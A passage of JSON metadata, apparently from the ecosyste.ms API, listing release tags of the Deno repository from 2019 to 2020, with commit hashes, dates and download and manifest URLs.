rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url"